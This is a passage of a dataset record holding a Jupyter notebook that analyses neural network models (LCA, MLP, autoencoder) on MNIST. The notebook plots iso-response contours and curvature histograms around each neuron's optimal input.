\"Oceania\",\n \"Asia\",\n \"Asia\",\n \"Asia\",\n \"Europe\",\n \"Asia\",\n \"Africa\",\n \"Africa\",\n \"Africa\",\n \"Europe\",\n \"Europe\",\n \"Europe\",\n \"Asia\",\n \"Africa\",\n \"Africa\",\n \"Asia\",\n \"Asia\",\n \"Africa\",\n \"Europe\",\n \"Oceania\",\n \"Africa\",\n \"Africa\",\n \"North America\",\n \"Europe\",\n \"Asia\",\n \"Europe\",\n \"Africa\",\n \"Africa\",\n \"Asia\",\n \"Africa\",\n \"Oceania\",\n \"Asia\",\n \"Europe\",\n \"Oceania\",\n \"Oceania\",\n \"Central America\",\n \"Africa\",\n \"Africa\",\n \"Oceania\",\n \"Asia\",\n \"Europe\",\n \"Europe\",\n \"Asia\",\n \"Asia\",\n \"Central America\",\n \"Oceania\",\n \"South America\",\n \"South America\",\n \"Asia\",\n \"Europe\",\n \"Europe\",\n \"Africa\",\n \"Europe\",\n \"Asia\",\n \"Africa\",\n \"Africa\",\n \"North America\",\n \"North America\",\n \"North America\",\n \"North America\",\n \"Oceania\",\n \"Africa\",\n \"Asia\",\n \"Europe\",\n \"Africa\",\n \"Africa\",\n \"Asia\",\n \"Europe\",\n \"Europe\",\n \"Oceania\",\n \"Africa\",\n \"Asia\",\n \"Africa\",\n \"Europe\",\n \"Asia\",\n \"Africa\",\n \"South America\",\n \"Europe\",\n \"Europe\",\n \"Asia\",\n \"Asia\",\n \"Asia\",\n \"Africa\",\n \"Asia\",\n \"Asia\",\n \"Africa\",\n \"Oceania\",\n \"North America\",\n \"Africa\",\n \"Asia\",\n \"Asia\",\n \"Oceania\",\n \"Africa\",\n \"Europe\",\n \"Asia\",\n \"Europe\",\n \"North America\",\n \"South America\",\n \"Asia\",\n \"Oceania\",\n \"South America\",\n \"Asia\",\n \"Asia\",\n \"Africa\",\n \"Africa\"\n ]\n }\n },\n config={\n \"circularType\": \"bubble\",\n \"colorBy\": \"Continent\",\n \"graphType\": \"Circular\",\n \"hierarchy\": [\n \"Continent\",\n \"Country\"\n ],\n \"theme\": \"paulTol\",\n \"title\": \"Annual CO2 Emmisions in 2018\"\n },\n width=613,\n height=613,\n events=CXEvents(),\n after_render=[],\n other_init_params={\n \"version\": 35,\n \"events\": False,\n \"info\": False,\n \"afterRenderInit\": False,\n \"noValidate\": True\n }\n)\n\ndisplay = CXNoteBook(cx) \ndisplay.render(output_file=\"bubble_4.html\") \n",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
]
] |
cb28fc5b6e03fb1917153f91b3c745dc764f2c3b | 42,516 | ipynb | Jupyter Notebook | tf1x/vis/vis_deep_iso_contours.ipynb | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2017-04-27T17:19:31.000Z | 2021-11-07T03:37:59.000Z | tf1x/vis/vis_deep_iso_contours.ipynb | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2018-03-21T01:16:25.000Z | 2022-02-10T00:21:58.000Z | tf1x/vis/vis_deep_iso_contours.ipynb | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2017-02-01T19:49:57.000Z | 2021-12-08T03:16:58.000Z | 44.753684 | 139 | 0.616497 | [
[
[
"## Imports",
"_____no_output_____"
]
],
[
[
"import os\nimport sys\n%env CUDA_VISIBLE_DEVICES=0\n%matplotlib inline",
"_____no_output_____"
],
[
"import pickle\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom matplotlib.ticker import FormatStrFormatter\nimport tensorflow as tf\n\nroot_path = os.path.dirname(os.path.dirname(os.path.dirname(os.getcwd())))\nif root_path not in sys.path: sys.path.append(root_path)\n\nfrom DeepSparseCoding.tf1x.data.dataset import Dataset\nimport DeepSparseCoding.tf1x.data.data_selector as ds\nimport DeepSparseCoding.tf1x.utils.data_processing as dp\nimport DeepSparseCoding.tf1x.utils.plot_functions as pf\nimport DeepSparseCoding.tf1x.analysis.analysis_picker as ap",
"_____no_output_____"
],
[
"class lambda_params(object):\n def __init__(self, lamb=None):\n self.model_type = \"lambda\"\n self.model_name = \"lambda_mnist\"\n self.version = \"0.0\"\n self.save_info = \"analysis_test_carlini_targeted\"\n self.overwrite_analysis_log = False\n self.activation_function = lamb\n\nclass mlp_params(object):\n def __init__(self):\n self.model_type = \"mlp\"\n self.model_name = \"mlp_mnist\"\n self.version = \"0.0\"\n self.save_info = \"analysis_test_carlini_targeted\"\n self.overwrite_analysis_log = False\n\nclass lca_512_params(object):\n def __init__(self):\n self.model_type = \"lca\"\n self.model_name = \"lca_512_vh\"\n self.version = \"0.0\"\n self.save_info = \"analysis_train_carlini_targeted\"\n self.overwrite_analysis_log = False\n\nclass lca_768_params(object):\n def __init__(self):\n self.model_type = \"lca\"\n self.model_name = \"lca_768_mnist\"\n self.version = \"0.0\"\n #self.save_info = \"analysis_train_carlini_targeted\" # for vh\n self.save_info = \"analysis_test_carlini_targeted\" # for mnist\n self.overwrite_analysis_log = False\n\nclass lca_1024_params(object):\n def __init__(self):\n self.model_type = \"lca\"\n self.model_name = \"lca_1024_vh\"\n self.version = \"0.0\"\n self.save_info = \"analysis_train_carlini_targeted\"\n self.overwrite_analysis_log = False\n \nclass lca_1536_params(object):\n def __init__(self):\n self.model_type = \"lca\"\n self.model_name = \"lca_1536_mnist\"\n self.version = \"0.0\"\n self.save_info = \"analysis_test_carlini_targeted\"\n self.overwrite_analysis_log = False\n\nclass ae_deep_params(object):\n def __init__(self):\n self.model_type = \"ae\"\n self.model_name = \"ae_deep_mnist\"\n self.version = \"0.0\"\n self.save_info = \"analysis_test_carlini_targeted\"\n self.overwrite_analysis_log = False",
"_____no_output_____"
],
[
"lamb = lambda x : tf.reduce_sum(tf.square(x), axis=1, keepdims=True)\n#lamb = lambda x : x / tf.reduce_sum(tf.square(x), axis=1, keepdims=True)\n\nparams_list = [ae_deep_params()]#lca_768_params(), lca_1536_params()]\n\nfor params in params_list:\n params.model_dir = (os.path.expanduser(\"~\")+\"/Work/Projects/\"+params.model_name)\n\nanalyzer_list = [ap.get_analyzer(params.model_type) for params in params_list]",
"_____no_output_____"
],
[
"for analyzer, params in zip(analyzer_list, params_list):\n analyzer.setup(params)\n if(hasattr(params, \"activation_function\")):\n analyzer.model_params.activation_function = params.activation_function\n analyzer.setup_model(analyzer.model_params)\n analyzer.load_analysis(save_info=params.save_info)\n analyzer.model_name = params.model_name",
"_____no_output_____"
],
[
"for analyzer in analyzer_list:\n if(analyzer.analysis_params.model_type.lower() != \"lca\"\n and analyzer.analysis_params.model_type.lower() != \"lambda\"):\n pre_images = np.stack([analyzer.neuron_vis_output[\"optimal_stims\"][target_id][-1].reshape(28,28)\n for target_id in range(len(analyzer.analysis_params.neuron_vis_targets))], axis=0)\n pre_image_fig = pf.plot_weights(pre_images, title=analyzer.model_name+\" pre-images\", figsize=(4,8))\n pre_image_fig.savefig(analyzer.analysis_out_dir+\"/vis/pre_images.png\", transparent=True,\n bbox_inches=\"tight\", pad_inches=0.01)",
"_____no_output_____"
],
[
"#available_indices = [ 30, 45, 101, 223, 283, 335, 388, 491, 558, 571, 572,\n# 590, 599, 606, 619, 629, 641, 652, 693, 722, 724, 749,\n# 769, 787, 812, 819, 824, 906, 914, 927, 987, 1134, 1186,\n# 1196, 1297, 1376, 1409, 1534]\n#available_indices = np.array(range(analyzer.model.get_num_latent()))\navailable_indices = [2, 6, 8, 18, 21, 26]",
"_____no_output_____"
],
[
"step_idx = -1\n\nfor analyzer in analyzer_list:\n analyzer.available_indices = available_indices#np.array(range(analyzer.model.get_num_latent()))\n analyzer.target_neuron_idx = analyzer.available_indices[0]\n if(analyzer.analysis_params.model_type.lower() == \"lca\"):\n bf0 = analyzer.bf_stats[\"basis_functions\"][analyzer.target_neuron_idx]\n else: \n bf0 = analyzer.neuron_vis_output[\"optimal_stims\"][analyzer.target_neuron_idx][step_idx]\n bf0 = bf0.reshape(np.prod(analyzer.model.get_input_shape()[1:]))\n bf0 = bf0 / np.linalg.norm(bf0)\n \n fig, axes = plt.subplots(1, 2, figsize=(10,4))\n \n ax = pf.clear_axis(axes[0])\n ax.imshow(bf0.reshape(int(np.sqrt(bf0.size)), int(np.sqrt(bf0.size))), cmap=\"Greys_r\")#, vmin=0.0, vmax=1.0)\n ax.set_title(\"Optimal\\ninput image\")\n \n if(analyzer.analysis_params.model_type.lower() != \"lca\"):\n axes[1].plot(analyzer.neuron_vis_output[\"loss\"][analyzer.target_neuron_idx])\n axes[1].set_title(\"Optimization loss\")\n \n plt.show()",
"_____no_output_____"
],
[
"def find_orth_vect(matrix):\n rand_vect = np.random.rand(matrix.shape[0], 1)\n new_matrix = np.hstack((matrix, rand_vect))\n candidate_vect = np.zeros(matrix.shape[1]+1)\n candidate_vect[-1] = 1\n orth_vect = np.linalg.lstsq(new_matrix.T, candidate_vect, rcond=None)[0] # [0] indexes lst-sqrs solution\n orth_vect = np.squeeze((orth_vect / np.linalg.norm(orth_vect)).T) \n return orth_vect",
"_____no_output_____"
],
[
"def get_rand_vectors(bf0, num_orth_directions):\n rand_vectors = bf0.T[:,None] # matrix of alternate vectors\n for orth_idx in range(num_orth_directions):\n tmp_bf1 = find_orth_vect(rand_vectors)\n rand_vectors = np.append(rand_vectors, tmp_bf1[:,None], axis=1)\n return rand_vectors.T[1:, :] # [num_vectors, vector_length]",
"_____no_output_____"
],
[
"def get_alt_vectors(bf0, bf1s):\n alt_vectors = bf0.T[:,None] # matrix of alternate vectors\n for tmp_bf1 in bf1s:\n tmp_bf1 = np.squeeze((tmp_bf1 / np.linalg.norm(tmp_bf1)).T)\n alt_vectors = np.append(alt_vectors, tmp_bf1[:,None], axis=1)\n return alt_vectors.T[1:, :] # [num_vectors, vector_length]",
"_____no_output_____"
],
[
"def get_norm_activity(analyzer, neuron_id_list, stim0_list, stim1_list, num_imgs):\n # Construct point dataset\n \n #x_pts = np.linspace(-0.5, 19.5, int(np.sqrt(num_imgs)))\n #y_pts = np.linspace(-10.0, 10.0, int(np.sqrt(num_imgs)))\n x_pts = np.linspace(-0.5, 3.5, int(np.sqrt(num_imgs)))\n y_pts = np.linspace(-2.0, 2.0, int(np.sqrt(num_imgs)))\n #x_pts = np.linspace(0.9, 1.1, int(np.sqrt(num_imgs)))\n #y_pts = np.linspace(-0.1, 0.1, int(np.sqrt(num_imgs)))\n #x_pts = np.linspace(0.999, 1.001, int(np.sqrt(num_imgs)))\n #y_pts = np.linspace(-0.001, 0.001, int(np.sqrt(num_imgs)))\n \n X_mesh, Y_mesh = np.meshgrid(x_pts, y_pts)\n proj_datapoints = np.stack([X_mesh.reshape(num_imgs), Y_mesh.reshape(num_imgs)], axis=1)\n\n out_dict = {\n \"norm_activity\": [],\n \"proj_neuron0\": [],\n \"proj_neuron1\": [],\n \"proj_v\": [],\n \"v\": [],\n \"proj_datapoints\": proj_datapoints,\n \"X_mesh\": X_mesh,\n \"Y_mesh\": Y_mesh}\n\n # TODO: This can be made to be much faster by compiling all of the stimulus into a single set and computing activations\n for neuron_id, stim0 in zip(neuron_id_list, stim0_list):\n activity_sub_list = []\n proj_neuron0_sub_list = []\n proj_neuron1_sub_list = []\n proj_v_sub_list = []\n v_sub_list = []\n for stim1 in stim1_list:\n proj_matrix, v = dp.bf_projections(stim0, stim1)\n proj_neuron0_sub_list.append(np.dot(proj_matrix, stim0).T) #project\n proj_neuron1_sub_list.append(np.dot(proj_matrix, stim1).T) #project\n proj_v_sub_list.append(np.dot(proj_matrix, v).T) #project\n v_sub_list.append(v)\n datapoints = np.stack([np.dot(proj_matrix.T, proj_datapoints[data_id,:])\n for data_id in range(num_imgs)], axis=0) #inject\n datapoints = dp.reshape_data(datapoints, flatten=False)[0]\n datapoints = {\"test\": Dataset(datapoints, lbls=None, ignore_lbls=None, rand_state=analyzer.rand_state)}\n datapoints = analyzer.model.reshape_dataset(datapoints, analyzer.model_params)\n activations = analyzer.compute_activations(datapoints[\"test\"].images)#, batch_size=int(np.sqrt(num_imgs)))\n activations = activations[:, neuron_id]\n activity_max = np.amax(np.abs(activations))\n activations = activations / (activity_max + 0.00001)\n activations = activations.reshape(int(np.sqrt(num_imgs)), int(np.sqrt(num_imgs)))\n activity_sub_list.append(activations)\n out_dict[\"norm_activity\"].append(activity_sub_list)\n out_dict[\"proj_neuron0\"].append(proj_neuron0_sub_list)\n out_dict[\"proj_neuron1\"].append(proj_neuron1_sub_list)\n out_dict[\"proj_v\"].append(proj_v_sub_list)\n out_dict[\"v\"].append(v_sub_list)\n return out_dict",
"_____no_output_____"
],
[
"analyzer = analyzer_list[0]\nstep_idx = -1\nnum_imgs = int(300**2)#int(228**2)\nmin_angle = 10\nuse_rand_orth = False\n\nnum_neurons = 2#1",
"_____no_output_____"
],
[
"if(use_rand_orth):\n target_neuron_indices = np.random.choice(analyzer.available_indices, num_neurons, replace=False)\n alt_stim_list = get_rand_vectors(stim0, num_neurons)\nelse:\n if(analyzer.analysis_params.model_type.lower() == \"lca\"):\n target_neuron_indices = np.random.choice(analyzer.available_indices, num_neurons, replace=False)\n analyzer.neuron_angles = analyzer.get_neuron_angles(analyzer.bf_stats)[1] * (180/np.pi)\n alt_stim_list = []\n else:\n all_neuron_indices = np.random.choice(analyzer.available_indices, 2*num_neurons, replace=False)\n target_neuron_indices = all_neuron_indices[:num_neurons]\n orth_neuron_indices = all_neuron_indices[num_neurons:]\n\nif(analyzer.analysis_params.model_type.lower() == \"ae\"):\n neuron_vis_targets = np.array(analyzer.analysis_params.neuron_vis_targets)\n neuron_id_list = neuron_vis_targets[target_neuron_indices]\nelse:\n neuron_id_list = target_neuron_indices\nstim0_list = []\nstimid0_list = []\n\nfor neuron_id in target_neuron_indices:\n if(analyzer.analysis_params.model_type.lower() == \"lca\"):\n stim0 = analyzer.bf_stats[\"basis_functions\"][neuron_id]\n else:\n stim0 = analyzer.neuron_vis_output[\"optimal_stims\"][neuron_id][step_idx]\n stim0 = stim0.reshape(np.prod(analyzer.model.get_input_shape()[1:])) # shape=[784]\n stim0 = stim0 / np.linalg.norm(stim0) # normalize length\n stim0_list.append(stim0)\n stimid0_list.append(neuron_id)\n if not use_rand_orth:\n if(analyzer.analysis_params.model_type.lower() == \"lca\"):\n gt_min_angle_indices = np.argwhere(analyzer.neuron_angles[neuron_id, :] > min_angle)\n sorted_angle_indices = np.argsort(analyzer.neuron_angles[neuron_id, gt_min_angle_indices], axis=0)\n vector_id = gt_min_angle_indices[sorted_angle_indices[0]].item()\n alt_stim = analyzer.bf_stats[\"basis_functions\"][vector_id]\n alt_stim = [np.squeeze(alt_stim.reshape(analyzer.model_params.num_pixels))]\n comparison_vector = get_alt_vectors(stim0, alt_stim)[0]\n alt_stim_list.append(comparison_vector)\n else:\n alt_stims = [analyzer.neuron_vis_output[\"optimal_stims\"][orth_neuron_idx][step_idx]\n for orth_neuron_idx in orth_neuron_indices]\n alt_stim_list = get_alt_vectors(stim0, alt_stims)",
"_____no_output_____"
]
],
[
[
"\"\"\"\nfor lambda tests\n\"\"\"\none_hot = np.array([1,1]+[0]*(analyzer.model.get_input_shape()[1]-2))\none_hot = one_hot / np.linalg.norm(one_hot)\nhots = [np.roll(one_hot, shift=shift) for shift in range(2*num_neurons)]\nstim0_list = hots[:num_neurons]\nalt_stim_list = hots[num_neurons:]\nneuron_id_list = [0]*len(stim0_list)",
"_____no_output_____"
]
],
[
[
"out_dict = get_norm_activity(analyzer, neuron_id_list, stim0_list, alt_stim_list, num_imgs)",
"_____no_output_____"
],
[
"num_plots_y = num_neurons + 1 # extra dimension for example image\nnum_plots_x = num_neurons + 1 # extra dimension for example image\n\ngs0 = gridspec.GridSpec(num_plots_y, num_plots_x, wspace=0.1, hspace=0.1)\nfig = plt.figure(figsize=(10, 10))\ncmap = plt.get_cmap('viridis')\n\north_vectors = []\nfor neuron_loop_index in range(num_neurons): # rows\n for orth_loop_index in range(num_neurons): # columns\n norm_activity = out_dict[\"norm_activity\"][neuron_loop_index][orth_loop_index]\n proj_neuron0 = out_dict[\"proj_neuron0\"][neuron_loop_index][orth_loop_index]\n proj_neuron1 = out_dict[\"proj_neuron1\"][neuron_loop_index][orth_loop_index]\n proj_v = out_dict[\"proj_v\"][neuron_loop_index][orth_loop_index]\n orth_vectors.append(out_dict[\"v\"][neuron_loop_index][orth_loop_index])\n\n curve_plot_y_idx = neuron_loop_index + 1\n curve_plot_x_idx = orth_loop_index + 1\n curve_ax = pf.clear_axis(fig.add_subplot(gs0[curve_plot_y_idx, curve_plot_x_idx]))\n\n # NOTE: each subplot has a renormalized color scale\n # TODO: Add scale bar like in the lca inference plots\n vmin = np.min(norm_activity)\n vmax = np.max(norm_activity)\n\n levels = 5\n contsf = curve_ax.contourf(out_dict[\"X_mesh\"], out_dict[\"Y_mesh\"], norm_activity,\n levels=levels, vmin=vmin, vmax=vmax, alpha=1.0, antialiased=True, cmap=cmap)\n\n curve_ax.arrow(0, 0, proj_neuron0[0].item(), proj_neuron0[1].item(),\n width=0.05, head_width=0.15, head_length=0.15, fc='r', ec='r')\n curve_ax.arrow(0, 0, proj_neuron1[0].item(), proj_neuron1[1].item(),\n width=0.05, head_width=0.15, head_length=0.15, fc='w', ec='w')\n curve_ax.arrow(0, 0, proj_v[0].item(), proj_v[1].item(),\n width=0.05, head_width=0.15, head_length=0.15, fc='k', ec='k')\n #curve_ax.arrow(0, 0, proj_neuron0[0].item(), proj_neuron0[1].item(),\n # width=0.05, head_width=0.15, head_length=0.15, fc='r', ec='r')\n #curve_ax.arrow(0, 0, proj_neuron1[0].item(), proj_neuron1[1].item(),\n # width=0.005, head_width=0.15, head_length=0.15, fc='w', ec='w')\n #curve_ax.arrow(0, 0, proj_v[0].item(), proj_v[1].item(),\n # width=0.05, head_width=0.05, head_length=0.15, fc='k', ec='k')\n\n #curve_ax.set_xlim([-0.5, 19.5])\n #curve_ax.set_ylim([-10, 10.0])\n curve_ax.set_xlim([-0.5, 3.5])\n curve_ax.set_ylim([-2, 2.0])\n #curve_ax.set_xlim([0.999, 1.001])\n #curve_ax.set_ylim([-0.001, 0.001])\n \nfor plot_y_id in range(num_plots_y):\n for plot_x_id in range(num_plots_x):\n if plot_y_id > 0 and plot_x_id == 0:\n bf_ax = pf.clear_axis(fig.add_subplot(gs0[plot_y_id, plot_x_id]))\n bf_resh = stim0_list[plot_y_id-1].reshape((int(np.sqrt(np.prod(analyzer.model.params.data_shape))),\n int(np.sqrt(np.prod(analyzer.model.params.data_shape)))))\n bf_ax.imshow(bf_resh, cmap=\"Greys_r\")\n if plot_y_id == 1:\n bf_ax.set_title(\"Target vectors\", color=\"r\", fontsize=16)\n if plot_y_id == 0 and plot_x_id > 0:\n #comparison_img = comparison_vectors[plot_x_id-1, :].reshape(int(np.sqrt(np.prod(analyzer.model.params.data_shape))),\n # int(np.sqrt(np.prod(analyzer.model.params.data_shape))))\n orth_img = orth_vectors[plot_x_id-1].reshape(int(np.sqrt(np.prod(analyzer.model.params.data_shape))),\n int(np.sqrt(np.prod(analyzer.model.params.data_shape))))\n orth_ax = pf.clear_axis(fig.add_subplot(gs0[plot_y_id, plot_x_id]))\n orth_ax.imshow(orth_img, cmap=\"Greys_r\")\n if plot_x_id == 1:\n #orth_ax.set_ylabel(\"Orthogonal vectors\", color=\"k\", fontsize=16)\n orth_ax.set_title(\"Orthogonal vectors\", color=\"k\", fontsize=16)\n\nplt.show()\nfig.savefig(analyzer.analysis_out_dir+\"/vis/iso_contour_grid_04.png\")",
"_____no_output_____"
]
],
[
[
"### Curvature comparisons",
"_____no_output_____"
]
],
[
[
"id_list = [1, 1]#, 3]\nfor analyzer, list_index in zip(analyzer_list, id_list):\n analyzer.bf0 = stim0_list[list_index]\n analyzer.bf_id0 = stimid0_list[list_index]\n analyzer.bf0_slice_scale = 0.80 # between -1 and 1",
"_____no_output_____"
],
[
"\"\"\"\n* Compute a unit vector that is in the same plane as a given basis function pair (B1,B2) and\n is orthogonal to B1, where B1 is the target basis for comparison and B2 is selected from all other bases.\n* Construct a line of data points in this plane\n* Project the data points into image space, compute activations, plot activations\n\"\"\"\nfor analyzer in analyzer_list:\n analyzer.pop_num_imgs = 100\n \n #orthogonal_list = [idx for idx in range(analyzer.bf_stats[\"num_outputs\"])]\n orthogonal_list = [idx for idx in range(analyzer.bf_stats[\"num_outputs\"]) if idx != analyzer.bf_id0]\n analyzer.num_orthogonal = len(orthogonal_list)\n \n pop_x_pts = np.linspace(-2.0, 2.0, int(analyzer.pop_num_imgs))\n pop_y_pts = np.linspace(-2.0, 2.0, int(analyzer.pop_num_imgs))\n pop_X, pop_Y = np.meshgrid(pop_x_pts, pop_y_pts)\n full_pop_proj_datapoints = np.stack([pop_X.reshape(analyzer.pop_num_imgs**2),\n pop_Y.reshape(analyzer.pop_num_imgs**2)], axis=1) # construct a grid\n \n # find a location to take a slice\n # to avoid having to exactly find a point we use a relative position\n x_target = pop_x_pts[int(analyzer.bf0_slice_scale*analyzer.pop_num_imgs)]\n \n slice_indices = np.where(full_pop_proj_datapoints[:,0]==x_target)[0]\n analyzer.pop_proj_datapoints = full_pop_proj_datapoints[slice_indices,:] # slice grid\n \n analyzer.pop_datapoints = [None,]*analyzer.num_orthogonal\n for pop_idx, tmp_bf_id1 in enumerate(orthogonal_list):\n tmp_bf1 = analyzer.bf_stats[\"basis_functions\"][tmp_bf_id1].reshape((analyzer.model_params.num_pixels))\n tmp_bf1 /= np.linalg.norm(tmp_bf1)\n tmp_proj_matrix, v = analyzer.bf_projections(analyzer.bf0, tmp_bf1) \n analyzer.pop_datapoints[pop_idx] = np.dot(analyzer.pop_proj_datapoints, tmp_proj_matrix)#[slice_indices,:]\n \n analyzer.pop_datapoints = np.reshape(np.stack(analyzer.pop_datapoints, axis=0),\n [analyzer.num_orthogonal*analyzer.pop_num_imgs, analyzer.model_params.num_pixels])\n \n analyzer.pop_datapoints = dp.reshape_data(analyzer.pop_datapoints, flatten=False)[0]\n analyzer.pop_datapoints = {\"test\": Dataset(analyzer.pop_datapoints, lbls=None,\n ignore_lbls=None, rand_state=analyzer.rand_state)}\n #analyzer.pop_datapoints = analyzer.model.preprocess_dataset(analyzer.pop_datapoints,\n # params={\"whiten_data\":analyzer.model_params.whiten_data,\n # \"whiten_method\":analyzer.model_params.whiten_method,\n # \"whiten_batch_size\":10})\n analyzer.pop_datapoints = analyzer.model.reshape_dataset(analyzer.pop_datapoints, analyzer.model_params)\n #analyzer.pop_datapoints[\"test\"].images /= np.max(np.abs(analyzer.pop_datapoints[\"test\"].images))\n #analyzer.pop_datapoints[\"test\"].images *= 10#analyzer.analysis_params.input_scale",
"_____no_output_____"
],
[
"for analyzer in analyzer_list:\n pop_activations = analyzer.compute_activations(analyzer.pop_datapoints[\"test\"].images)[:, analyzer.bf_id0]\n pop_activations = pop_activations.reshape([analyzer.num_orthogonal, analyzer.pop_num_imgs])\n analyzer.pop_norm_activity = pop_activations / (np.amax(np.abs(pop_activations)) + 0.0001)",
"_____no_output_____"
],
[
"\"\"\"\n* Construct the set of unit-length bases that are orthogonal to B0 (there should be B0.size-1 of them)\n* Construct a line of data points in each plane defined by B0 and a given orthogonal basis\n* Project the data points into image space, compute activations, plot activations\n\"\"\"\nfor analyzer in analyzer_list:\n analyzer.rand_pop_num_imgs = 100\n analyzer.rand_num_orthogonal = analyzer.bf_stats[\"num_inputs\"]-1\n \n pop_x_pts = np.linspace(-2.0, 2.0, int(analyzer.rand_pop_num_imgs))\n pop_y_pts = np.linspace(-2.0, 2.0, int(analyzer.rand_pop_num_imgs))\n pop_X, pop_Y = np.meshgrid(pop_x_pts, pop_y_pts)\n full_rand_pop_proj_datapoints = np.stack([pop_X.reshape(analyzer.rand_pop_num_imgs**2),\n pop_Y.reshape(analyzer.rand_pop_num_imgs**2)], axis=1) # construct a grid\n \n # find a location to take a slice\n x_target = pop_x_pts[int(analyzer.bf0_slice_scale*np.sqrt(analyzer.rand_pop_num_imgs))]\n \n slice_indices = np.where(full_rand_pop_proj_datapoints[:,0]==x_target)[0]\n analyzer.rand_pop_proj_datapoints = full_rand_pop_proj_datapoints[slice_indices,:] # slice grid\n \n orth_col_matrix = analyzer.bf0.T[:,None]\n analyzer.rand_pop_datapoints = [None,]*analyzer.rand_num_orthogonal\n for pop_idx in range(analyzer.rand_num_orthogonal):\n v = find_orth_vect(orth_col_matrix)\n orth_col_matrix = np.append(orth_col_matrix, v[:,None], axis=1)\n tmp_proj_matrix = np.stack([analyzer.bf0, v], axis=0)\n analyzer.rand_pop_datapoints[pop_idx] = np.dot(analyzer.rand_pop_proj_datapoints,\n tmp_proj_matrix)\n\n analyzer.rand_pop_datapoints = np.reshape(np.stack(analyzer.rand_pop_datapoints, axis=0),\n [analyzer.rand_num_orthogonal*analyzer.rand_pop_num_imgs, analyzer.model_params.num_pixels])\n\n analyzer.rand_pop_datapoints = dp.reshape_data(analyzer.rand_pop_datapoints, flatten=False)[0]\n analyzer.rand_pop_datapoints = {\"test\": Dataset(analyzer.rand_pop_datapoints, lbls=None,\n ignore_lbls=None, rand_state=analyzer.rand_state)}\n #analyzer.rand_pop_datapoints = analyzer.model.preprocess_dataset(analyzer.rand_pop_datapoints,\n # params={\"whiten_data\":analyzer.model.params.whiten_data,\n # \"whiten_method\":analyzer.model.params.whiten_method,\n # \"whiten_batch_size\":10})\n analyzer.rand_pop_datapoints = analyzer.model.reshape_dataset(analyzer.rand_pop_datapoints,\n analyzer.model_params)\n #analyzer.rand_pop_datapoints[\"test\"].images /= np.max(np.abs(analyzer.rand_pop_datapoints[\"test\"].images))\n #analyzer.rand_pop_datapoints[\"test\"].images *= 10# analyzer.analysis_params.input_scale",
"_____no_output_____"
],
[
"for analyzer in analyzer_list:\n rand_pop_activations = analyzer.compute_activations(analyzer.rand_pop_datapoints[\"test\"].images)[:,\n analyzer.bf_id0]\n rand_pop_activations = rand_pop_activations.reshape([analyzer.rand_num_orthogonal, analyzer.rand_pop_num_imgs])\n analyzer.rand_pop_norm_activity = rand_pop_activations / (np.amax(np.abs(rand_pop_activations)) + 0.0001)",
"_____no_output_____"
],
[
"for analyzer in analyzer_list:\n analyzer.bf_coeffs = [\n np.polynomial.polynomial.polyfit(analyzer.pop_proj_datapoints[:,1],\n analyzer.pop_norm_activity[orthog_idx,:], deg=2)\n for orthog_idx in range(analyzer.num_orthogonal)]\n analyzer.bf_fits = [\n np.polynomial.polynomial.polyval(analyzer.pop_proj_datapoints[:,1], coeff)\n for coeff in analyzer.bf_coeffs]\n analyzer.bf_curvatures = [np.polyder(fit, m=2) for fit in analyzer.bf_fits]\n \n analyzer.rand_coeffs = [np.polynomial.polynomial.polyfit(analyzer.rand_pop_proj_datapoints[:,1],\n analyzer.rand_pop_norm_activity[orthog_idx,:], deg=2)\n for orthog_idx in range(analyzer.rand_num_orthogonal)]\n analyzer.rand_fits = [np.polynomial.polynomial.polyval(analyzer.rand_pop_proj_datapoints[:,1], coeff)\n for coeff in analyzer.rand_coeffs]\n analyzer.rand_curvatures = [np.polyder(fit, m=2) for fit in analyzer.rand_fits]",
"_____no_output_____"
],
[
"analyzer_idx = 0\n\nbf_curvatures = np.stack(analyzer_list[analyzer_idx].bf_coeffs, axis=0)[:,2]\nrand_curvatures = np.stack(analyzer_list[analyzer_idx].rand_coeffs, axis=0)[:,2]\n\nnum_bins = 100\nbins = np.linspace(-0.2, 0.01, num_bins)\nbar_width = np.diff(bins).min()\nbf_hist, bin_edges = np.histogram(bf_curvatures.flatten(), bins)\nrand_hist, _ = np.histogram(rand_curvatures.flatten(), bins)\nbin_left, bin_right = bin_edges[:-1], bin_edges[1:]\nbin_centers = bin_left + (bin_right - bin_left)/2\n\nfig, ax = plt.subplots(1, figsize=(16,9))\n\nax.bar(bin_centers, rand_hist, width=bar_width, log=False, color=\"g\", alpha=0.5, align=\"center\",\n label=\"Random Projection\")\nax.bar(bin_centers, bf_hist, width=bar_width, log=False, color=\"r\", alpha=0.5, align=\"center\",\n label=\"BF Projection\")\n\nax.set_xticks(bin_left, minor=True)\nax.set_xticks([bin_left[0], bin_left[int(len(bin_left)/2)], 0.0], minor=False)\nax.xaxis.set_major_formatter(FormatStrFormatter(\"%0.3f\"))\nfor tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(24) \nfor tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(24) \n\nax.set_title(\"Histogram of Curvatures\", fontsize=32)\nax.set_xlabel(\"Curvature\", fontsize=32)\nax.set_ylabel(\"Count\", fontsize=32)\nax.legend(loc=2, fontsize=32)\nfig.savefig(analyzer.analysis_out_dir+\"/vis/histogram_of_curvatures_bf0id\"+str(analyzer.bf_id0)+\".png\",\n transparent=True, bbox_inches=\"tight\", pad_inches=0.01)\nplt.show()",
"_____no_output_____"
]
],
[
[
"for analyzer in analyzer_list:\n analyzer.orth_col_matrix = analyzer.bf0.T[:,None]\n analyzer.rand_num_orthogonal = np.prod(analyzer.model.get_input_shape()[1:])-1\n\n for pop_idx in range(analyzer.rand_num_orthogonal):\n v = find_orth(analyzer.orth_col_matrix)\n analyzer.orth_col_matrix = np.append(analyzer.orth_col_matrix, v[:,None], axis=1)\n\n if all(np.abs(np.dot(analyzer.bf0, col)) < 1e-9 for col in analyzer.orth_col_matrix[:,1:].T):\n print(\"Success\")\n else:\n count = np.sum([int(np.abs(np.dot(analyzer.bf0, col)) < 1e-9) for col in analyzer.orth_col_matrix[:,1:].T])\n print(\"Failure,\", count, \"were non-orthogonal\")",
"_____no_output_____"
],
[
